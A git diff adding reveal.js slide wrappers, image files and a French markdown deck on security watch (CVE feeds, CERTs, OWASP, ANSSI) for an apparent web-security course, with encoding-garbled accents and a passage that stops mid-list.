diff --git a/content/slides/1337/anticiper.html b/content/slides/1337/anticiper.html
new file mode 100644
index 0000000000000000000000000000000000000000..a8f8c57d8eb18644302de188aa17eca8b4472153
--- /dev/null
+++ b/content/slides/1337/anticiper.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>anticiper</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/anticiper.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/csrf.html b/content/slides/1337/csrf.html
new file mode 100644
index 0000000000000000000000000000000000000000..0e2c1af70051edcdab4e06ba58cb51d87c7da2b4
--- /dev/null
+++ b/content/slides/1337/csrf.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>CSRF</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/csrf.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/drupalgeddon.html b/content/slides/1337/drupalgeddon.html
new file mode 100644
index 0000000000000000000000000000000000000000..b34d670c5383f67760fd20f393c5aaf94935b7fd
--- /dev/null
+++ b/content/slides/1337/drupalgeddon.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>Drupalgeddon</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/drupalgeddon.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-1.jpg b/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-1.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..d49e9fb745f2ace5848dccd4ea2e0b13f29d54d3
Binary files /dev/null and b/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-1.jpg differ
diff --git a/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-5.jpg b/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-5.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..b3e19cab0ee913c1a5e22ec9e075eebbf4d7ffc5
Binary files /dev/null and b/content/slides/1337/images/anticiper/Bruce-Schneier-Quotes-5.jpg differ
diff --git a/content/slides/1337/images/anticiper/Flagship_banner.jpg b/content/slides/1337/images/anticiper/Flagship_banner.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..320b6a1b8a0025b345da99918b8f09e441652d3d
Binary files /dev/null and b/content/slides/1337/images/anticiper/Flagship_banner.jpg differ
diff --git a/content/slides/1337/images/anticiper/Incubator_banner.jpg b/content/slides/1337/images/anticiper/Incubator_banner.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ed818e7cd6c833a59f3c611f031c8b7b6b46f6bc
Binary files /dev/null and b/content/slides/1337/images/anticiper/Incubator_banner.jpg differ
diff --git a/content/slides/1337/images/anticiper/Lab_banner.jpg b/content/slides/1337/images/anticiper/Lab_banner.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ef97ebc6f72c24254fa3cffd1e4505403990a18f
Binary files /dev/null and b/content/slides/1337/images/anticiper/Lab_banner.jpg differ
diff --git a/content/slides/1337/images/anticiper/Low_activity.jpg b/content/slides/1337/images/anticiper/Low_activity.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ca771b9b8d3e85133eb0c37fc8a4d2c494f3cb84
Binary files /dev/null and b/content/slides/1337/images/anticiper/Low_activity.jpg differ
diff --git a/content/slides/1337/images/anticiper/bepositive.jpg b/content/slides/1337/images/anticiper/bepositive.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..58c1439ea4e6c0fab4d576a1bbc3b0ec08440a59
Binary files /dev/null and b/content/slides/1337/images/anticiper/bepositive.jpg differ
diff --git a/content/slides/1337/images/anticiper/ispconfig.jpg b/content/slides/1337/images/anticiper/ispconfig.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..21c89d7a53ca1b4dec3c8f83d4f2bb1fe7ebef28
Binary files /dev/null and b/content/slides/1337/images/anticiper/ispconfig.jpg differ
diff --git a/content/slides/1337/images/anticiper/phpmyadmin-vuln.png b/content/slides/1337/images/anticiper/phpmyadmin-vuln.png
new file mode 100644
index 0000000000000000000000000000000000000000..68fe4864106ca2252f8713b18ee47c917f7a4c9a
Binary files /dev/null and b/content/slides/1337/images/anticiper/phpmyadmin-vuln.png differ
diff --git a/content/slides/1337/images/anticiper/yoda.gif b/content/slides/1337/images/anticiper/yoda.gif
new file mode 100644
index 0000000000000000000000000000000000000000..f6c12c5abe7bc8ae0c549b2fb5004e1003f1d6ad
Binary files /dev/null and b/content/slides/1337/images/anticiper/yoda.gif differ
diff --git a/content/slides/1337/images/csrf/csrf-stp.png b/content/slides/1337/images/csrf/csrf-stp.png
new file mode 100644
index 0000000000000000000000000000000000000000..a4cd4c7f464bd954281632cc04de2813ed3ae086
Binary files /dev/null and b/content/slides/1337/images/csrf/csrf-stp.png differ
diff --git a/content/slides/1337/images/csrf/csrf.png b/content/slides/1337/images/csrf/csrf.png
new file mode 100644
index 0000000000000000000000000000000000000000..ad51e0512d710923bdfe744d1027698516939908
Binary files /dev/null and b/content/slides/1337/images/csrf/csrf.png differ
diff --git a/content/slides/1337/images/drupalgeddon/Google-fu-chuck-norris.jpg b/content/slides/1337/images/drupalgeddon/Google-fu-chuck-norris.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..5be8d496af3f188fd2fe8ed818dc776245a5d641
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/Google-fu-chuck-norris.jpg differ
diff --git a/content/slides/1337/images/drupalgeddon/down_the_rabbit_hole.jpg b/content/slides/1337/images/drupalgeddon/down_the_rabbit_hole.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..95a93393d30b12f661ba90a21d5fbcea16dc26b1
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/down_the_rabbit_hole.jpg differ
diff --git a/content/slides/1337/images/drupalgeddon/drupalgeddon.jpg b/content/slides/1337/images/drupalgeddon/drupalgeddon.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..9791aca44c02e150c6697a6ab53d5c45bcef1b38
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/drupalgeddon.jpg differ
diff --git a/content/slides/1337/images/drupalgeddon/viagra.jpg b/content/slides/1337/images/drupalgeddon/viagra.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..e21e0b679343febfe046c2f5b3ecf354a21e8b34
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/viagra.jpg differ
diff --git a/content/slides/1337/images/drupalgeddon/woot.gif b/content/slides/1337/images/drupalgeddon/woot.gif
new file mode 100644
index 0000000000000000000000000000000000000000..1dce2fddfd210e72b3b1b2fe70999597861fa595
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/woot.gif differ
diff --git a/content/slides/1337/images/drupalgeddon/yes.jpg b/content/slides/1337/images/drupalgeddon/yes.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..c171348101cd3ee92cde2f7d3704e02e3bf232d9
Binary files /dev/null and b/content/slides/1337/images/drupalgeddon/yes.jpg differ
diff --git a/content/slides/1337/images/sqli/sqlinjection_comics.png b/content/slides/1337/images/sqli/sqlinjection_comics.png
new file mode 100644
index 0000000000000000000000000000000000000000..530ddc0473ec44d032181c4b8b13a93caa738c6d
Binary files /dev/null and b/content/slides/1337/images/sqli/sqlinjection_comics.png differ
diff --git a/content/slides/1337/images/sqli/sqlmap.png b/content/slides/1337/images/sqli/sqlmap.png
new file mode 100644
index 0000000000000000000000000000000000000000..ecca7f9cfdffd88357ac615fc501add4e24baa77
Binary files /dev/null and b/content/slides/1337/images/sqli/sqlmap.png differ
diff --git a/content/slides/1337/images/top10/Relative_Portions_of_Each_Attack_Type.png b/content/slides/1337/images/top10/Relative_Portions_of_Each_Attack_Type.png
new file mode 100644
index 0000000000000000000000000000000000000000..e24687dfa0a304183036b9ee4e87755b75fa9ae2
Binary files /dev/null and b/content/slides/1337/images/top10/Relative_Portions_of_Each_Attack_Type.png differ
diff --git a/content/slides/1337/images/xss/XSS-alice1.png b/content/slides/1337/images/xss/XSS-alice1.png
new file mode 100644
index 0000000000000000000000000000000000000000..0762d42ec2dcb7ef9dc9528ff3b80f8a29a2c9e6
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-alice1.png differ
diff --git a/content/slides/1337/images/xss/XSS-alice2.png b/content/slides/1337/images/xss/XSS-alice2.png
new file mode 100644
index 0000000000000000000000000000000000000000..71dd025d3d98710ad1091346084db298c5253d6c
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-alice2.png differ
diff --git a/content/slides/1337/images/xss/XSS-bob.png b/content/slides/1337/images/xss/XSS-bob.png
new file mode 100644
index 0000000000000000000000000000000000000000..e7939f23ff80df01686bad315548b426530ee9ad
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-bob.png differ
diff --git a/content/slides/1337/images/xss/XSS-fleche.png b/content/slides/1337/images/xss/XSS-fleche.png
new file mode 100644
index 0000000000000000000000000000000000000000..626241c40a8491ac2b54430931042158c6aeeab0
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-fleche.png differ
diff --git a/content/slides/1337/images/xss/XSS-infos.gif b/content/slides/1337/images/xss/XSS-infos.gif
new file mode 100644
index 0000000000000000000000000000000000000000..03a6428ff5aca4a908a7d29b4d16c2eb7a53efad
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-infos.gif differ
diff --git a/content/slides/1337/images/xss/XSS-scripts.png b/content/slides/1337/images/xss/XSS-scripts.png
new file mode 100644
index 0000000000000000000000000000000000000000..c6c6e4cc66c6078686c831a8e7943ef50397eb5f
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-scripts.png differ
diff --git a/content/slides/1337/images/xss/XSS-serveurpirate.png b/content/slides/1337/images/xss/XSS-serveurpirate.png
new file mode 100644
index 0000000000000000000000000000000000000000..974ecd4b574f76e4196fcf36c21eec80954eb2dc
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-serveurpirate.png differ
diff --git a/content/slides/1337/images/xss/XSS-serveurvictime.png b/content/slides/1337/images/xss/XSS-serveurvictime.png
new file mode 100644
index 0000000000000000000000000000000000000000..6149084e8b08c53c93c164f88aaece6774280513
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-serveurvictime.png differ
diff --git a/content/slides/1337/images/xss/XSS-site.png b/content/slides/1337/images/xss/XSS-site.png
new file mode 100644
index 0000000000000000000000000000000000000000..b65fb55a0a8b5f24fc5a73acfa573acef6ea1e55
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-site.png differ
diff --git a/content/slides/1337/images/xss/XSS-sitefaille.png b/content/slides/1337/images/xss/XSS-sitefaille.png
new file mode 100644
index 0000000000000000000000000000000000000000..1e861f91fa5f3f6eda237095a33ac9b9088eeb95
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-sitefaille.png differ
diff --git a/content/slides/1337/images/xss/XSS-sitepiege.png b/content/slides/1337/images/xss/XSS-sitepiege.png
new file mode 100644
index 0000000000000000000000000000000000000000..fb42dbd1d759d700d00581e2100942050f05982e
Binary files /dev/null and b/content/slides/1337/images/xss/XSS-sitepiege.png differ
diff --git a/content/slides/1337/images/xss/XSS.png b/content/slides/1337/images/xss/XSS.png
new file mode 100644
index 0000000000000000000000000000000000000000..eee8ceee9cb2d7b4a5625bd7d40fca3685468242
Binary files /dev/null and b/content/slides/1337/images/xss/XSS.png differ
diff --git a/content/slides/1337/images/xss/beef-webcam.jpg b/content/slides/1337/images/xss/beef-webcam.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..06272f2d6603b0db32ee07cadba36f8a3bf6afcc
Binary files /dev/null and b/content/slides/1337/images/xss/beef-webcam.jpg differ
diff --git a/content/slides/1337/images/xss/csp.png b/content/slides/1337/images/xss/csp.png
new file mode 100644
index 0000000000000000000000000000000000000000..7bfac0ce5b67dc295b4794ff19f270653d4dbf59
Binary files /dev/null and b/content/slides/1337/images/xss/csp.png differ
diff --git a/content/slides/1337/images/xss/inspector.png b/content/slides/1337/images/xss/inspector.png
new file mode 100644
index 0000000000000000000000000000000000000000..6cf8e8c0158b4c2e236e710cc9a7246edf27f428
Binary files /dev/null and b/content/slides/1337/images/xss/inspector.png differ
diff --git a/content/slides/1337/images/xss/sop.png b/content/slides/1337/images/xss/sop.png
new file mode 100644
index 0000000000000000000000000000000000000000..94ff160615c810c92530dc26af33e7b22dda6104
Binary files /dev/null and b/content/slides/1337/images/xss/sop.png differ
diff --git a/content/slides/1337/js.html b/content/slides/1337/js.html
new file mode 100644
index 0000000000000000000000000000000000000000..c747cb5be2733541adfc63310815ca0527059bf1
--- /dev/null
+++ b/content/slides/1337/js.html
@@ -0,0 +1,70 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+    <title>JS</title>
+
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+    <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/white.css">
+
+    <!-- Theme used for syntax highlighting of code -->
+    <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+    <link rel="stylesheet" href="../../node_modules/font-awesome/css/font-awesome.min.css">
+    <link rel="stylesheet" href="../main.css">
+
+    <!-- Printing and PDF exports -->
+    <script>
+      var link = document.createElement( 'link' );
+      link.rel = 'stylesheet';
+      link.type = 'text/css';
+      link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+      document.getElementsByTagName( 'head' )[0].appendChild( link );
+    </script>
+  </head>
+  <body>
+    <div class="reveal">
+      <div class="slides">
+        <section data-markdown="md/js.md"
+         data-separator="^\n\n\n"
+         data-separator-vertical="^\n\n"
+         data-separator-notes="^Note:"
+         data-charset="utf-8">
+       </section>
+      </div>
+    </div>
+
+    <script src="../../node_modules/reveal.js/lib/js/head.min.js"></script>
+    <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+    <script>
+      // More info about config & dependencies:
+      // - https://github.com/hakimel/reveal.js#configuration
+      // - https://github.com/hakimel/reveal.js#dependencies
+      Reveal.initialize({
+        controls: true,
+        progress: true,
+        history: true,
+        center: false,
+        dependencies: [
+          { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+          { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+            condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+            callback: function() {
+              Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+                var fragIndex = ele.innerHTML.indexOf("--")
+                if (fragIndex != -1){
+                  ele.innerHTML = ele.innerHTML.replace("--", "");
+                  ele.className = 'fragment';
+                }
+              });
+            }
+          },
+          { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+          { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+        ]
+      });
+    </script>
+  </body>
+</html>
diff --git a/content/slides/1337/md/anticiper.md b/content/slides/1337/md/anticiper.md
new file mode 100644
index 0000000000000000000000000000000000000000..2c907b155bcf40331680a5411d9855a355c5319e
--- /dev/null
+++ b/content/slides/1337/md/anticiper.md
@@ -0,0 +1,509 @@
+# Anticiper
+
+## aka le mÃ©tier qui rentre ...
+
+
+## Trouver des mentors
+
+![Bruce Schneier quote](images/anticiper/Bruce-Schneier-Quotes-1.jpg "Bruce Schneier quote")
+
+
+## Trouver des mentors
+
+![Bruce Schneier quote](images/anticiper/Bruce-Schneier-Quotes-5.jpg "Bruce Schneier quote")
+
+<i class="fa fa-quote-left"></i> la sÃ©curitÃ© n'est pas un produit c'est un process <i class="fa fa-quote-right"></i> _Bruce Schneier_
+
+
+## Organiser sa veille
+
+* [CVE (Common Vulnerabilities and Exposures)](http://cve.mitre.org/index.html)
+  * MITRE est une sociÃ©tÃ© qui
+    * a lancÃ© le projet CVE ("Common Vulnerabilities and Exposures")
+      * facilite l'Ã©change d'information de sÃ©curitÃ©
+    * maintient les ID de vulnÃ©rabilitÃ©
+* [CVE Details](https://www.cvedetails.com/)
+  * custom RSS
+
+
+## phpMyAdmin
+
+![phpMyAdmin](images/anticiper/phpmyadmin-vuln.png "phpMyAdmin")<!-- .element width="90%" -->
+
+Note:
+- bien percÃ©
+  - Ne pas trop exposer
+    - bien pratique
+      - Utiliser un client lourd
+        - MySQL Workbench
+
+
+## Organiser sa veille
+
+  * [National Vulnerability Database - US](https://nvd.nist.gov/)
+  * [CERT EU](https://cert.europa.eu/cert/filteredition/en/CERT-LatestNews.html)  
+  * [CERT FR](http://www.cert.ssi.gouv.fr/cert-fr/certfr.html) - [archive 2015](http://www.cert.ssi.gouv.fr/site/2015index.html)
+  * [CERT RENATER](https://services.renater.fr/ssi/cert/index) - [sÃ©curitÃ©](https://services.renater.fr/ssi/securite/index)
+  * et d'autres [CSIRT](http://www.cert.ssi.gouv.fr/cert-fr/cert.html)
+
+
+## Organiser sa veille
+
+* Sources reconnues
+  * [Bugtraq - Security Focus](http://www.securityfocus.com/bid)
+  * [Open Source Software Security Wiki](http://oss-security.openwall.org/wiki/)
+    * [<i class="fa fa-envelope"></i> Mailing list](http://oss-security.openwall.org/wiki/mailing-lists/oss-security)
+    * [<i class="fa fa-twitter"></i> openwall](https://twitter.com/openwall)
+  * [SecLists.Org Security Mailing List Archive](http://seclists.org/)
+
+
+## Organiser sa veille
+
+* Sources alternatives
+  * [Exploit Databse](https://www.exploit-db.com)
+  * [Shodan - Popular Searches](https://www.shodan.io/explore/popular)
+  * [Shodan - Recently Shared](https://www.shodan.io/explore/recent)
+
+* Sources spÃ©cialisÃ©s
+  * [WPScan Vulnerability Database](https://wpvulndb.com/)
+  * [drupalexploit.com](http://www.drupalexploit.com/)
+
+
+## Organiser sa veille
+
+* <i class="fa fa-twitter"></i> twitter
+  * [<i class="fa fa-list-alt"></i> ma liste ssi-infosec-hack](https://twitter.com/mazenovi/lists/ssi-infosec-hack)
+* <i class="fa fa-wordpress"></i> blog
+  * en anglais
+    * https://googleonlinesecurity.blogspot.fr/
+    * https://www.schneier.com/
+    * https://nakedsecurity.sophos.com/
+
+Note:
+- parler de netvibes et yahoo pipes (qui ets mort)
+  - considÃ©rer les solutions hÃ©bergÃ©es
+
+
+## Organiser sa veille
+
+* <i class="fa fa-wordpress"></i> blog
+  * en franÃ§ais
+    * http://www.bortzmeyer.org/
+    * https://reflets.info/    
+    * http://zythom.blogspot.fr/
+    * http://www.nolimitsecu.fr
+    * http://news0ft.blogspot.fr
+
+
+## Organiser sa veille
+
+* autre ...
+  * en franÃ§ais
+    * http://www.security-feeds.com/
+    * http://vigilance.fr/
+    * http://www.datasecuritybreach.fr/
+    * http://www.zataz.com/
+    * http://www.globalsecuritymag.fr/
+    * http://assiste.com/
+
+
+## OWASP
+
+* depuis janvier 2001
+* fondation AmÃ©ricaine
+    * [Ã  but non lucratif](http://en.wikipedia.org/wiki/501%28c%29_organization#501.28c.29.283.29)
+* en France
+    * Association loi 1901
+    * participe au [clusif - Club de la SÃ©curitÃ© de lâ€™Information FranÃ§ais](http://www.clusif.asso.fr/)
+    * Ludovic Petit & [Sebastien Gioria ](https://twitter.com/spoint)
+      * [L'OWASP, l'univers, et le reste](https://air.mozilla.org/talks-owasp-afup-firefoxos-security-mozilla-firefoxos-what-is-owasp-by-sebastien-gioria/)
+
+
+## OWASP - IndÃ©pendance
+
+* composÃ© d'expert indÃ©pendants
+* indÃ©pendant des fournisseurs de solution
+* indÃ©pendant des gouvernements
+* Les projets sont opensource
+* nombreux adhÃ©rents
+  * entreprises
+  * institutions
+  * [individus](https://docs.google.com/spreadsheets/d/1FQEj2xQb1uTxZMXshPs0suy1Bkb5iYCbHH_vrzHMVa4/edit)
+  * [join now](http://myowasp.force.com/memberappregion): <strike>adhÃ©sion gratuite</strike> donation obligatoire 50$ minimum
+
+Note:
+- le marchÃ© de la sÃ©curitÃ© est blindÃ© de commericaux
+  - et de conflit d'intÃ©rÃªt
+
+
+## OWASP - Projets
+
+!["OWASP Flagship mature project"](images/anticiper/Flagship_banner.jpg "OWASP Flagship mature project")<!-- .element width="70%"-->
+!["OWASP Lab medium level project"](images/anticiper/Lab_banner.jpg "OWASP Lab medium level project")<!-- .element width="70%"-->
+!["OWASP Low activity project"](images/anticiper/Low_activity.jpg "OWASP Low activity project")<!-- .element width="70%"-->
+!["OWASP Incubator new projects"](images/anticiper/Incubator_banner.jpg "OWASP Incubator new projects")<!-- .element width="70%"-->
+
+
+## [Owasp projects](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
+
+* [OWASP Top Ten project](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)
+* [OWASP Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Project)
+* [OWASP Risk Rating Methodology](https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology)
+* [OWASP Code Review Guide](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
+* [OWASP Developer Guide](https://www.owasp.org/index.php/OWASP_Guide_Project)
+
+
+## [Owasp projects](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
+
+* [OWASP Enterprise Security API](https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)
+* [OWASP Application Security Desk Reference](https://www.owasp.org/index.php/Category:OWASP_ASDR_Project)
+* [OWASP Cheat Sheets](https://www.owasp.org/index.php/Cheat_Sheets)
+* [OWASP Application Security Verification Standard (ASVS)](http://www.owasp.org/index.php/ASVS)
+* [OWASP Legal Project](http://www.owasp.org/index.php/Category:OWASP_Legal_Project)
+* [and more ...](https://www.owasp.org/index.php/Category:OWASP_Project#tab=Project_Inventory)
+
+
+## [ANSSI](href="http://www.ssi.gouv.fr)
+
+* organisme de
+  * [formation](http://www.ssi.gouv.fr/fr/anssi/formations/)
+    * sensibilisation / recommandation
+      * [guide d'hygiÃ¨ne informatique](http://www.ssi.gouv.fr/IMG/pdf/guide_hygiene_informatique_anssi.pdf)
+      * [Objectifs de sÃ©curitÃ© (dans le cadre du plan vigipirate)](http://www.ssi.gouv.fr/fr/defense-des-si/les-plans-gouvernementaux/) et au niveau [OIV](http://www.ssi.gouv.fr/actualite/lanssi-sattele-aux-decrets-dapplication-de-la-lpm-portant-sur-la-protection-des-operateurs-dimportance-vitale/)
+      * [cybersÃ©curitÃ© des systÃ¨me industriels](http://www.ssi.gouv.fr/fr/guides-et-bonnes-pratiques/recommandations-et-guides/securite-des-systemes-industriels/la-cybersecurite-des-systemes-industriels.html)
+      * [SÃ©curiser un site web](http://www.ssi.gouv.fr/guide/recommandations-pour-la-securisation-des-sites-web/)
+      * [ProtÃ©ger son site Internet des cyberattaques](http://www.ssi.gouv.fr/actualite/proteger-son-site-internet-des-cyberattaques/)
+
+
+## [ANSSI](href="http://www.ssi.gouv.fr)
+
+* certfication
+  * [de produits de sÃ©curitÃ©](http://www.ssi.gouv.fr/fr/produits-et-prestataires/produits-certifies-cc/)
+  * [de prestataires de services de confiance](http://www.ssi.gouv.fr/fr/produits-et-prestataires/prestataires-de-services-de-confiance-qualifies/)
+* d'intervention / investigation
+
